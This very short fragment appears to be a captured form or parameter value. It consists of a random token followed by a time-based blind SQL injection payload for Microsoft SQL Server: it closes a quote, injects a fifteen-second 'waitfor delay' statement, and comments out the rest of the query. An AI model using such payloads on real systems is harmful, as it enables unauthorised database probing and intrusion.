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555IgZtSgWg'; waitfor delay '0:0:15' -- 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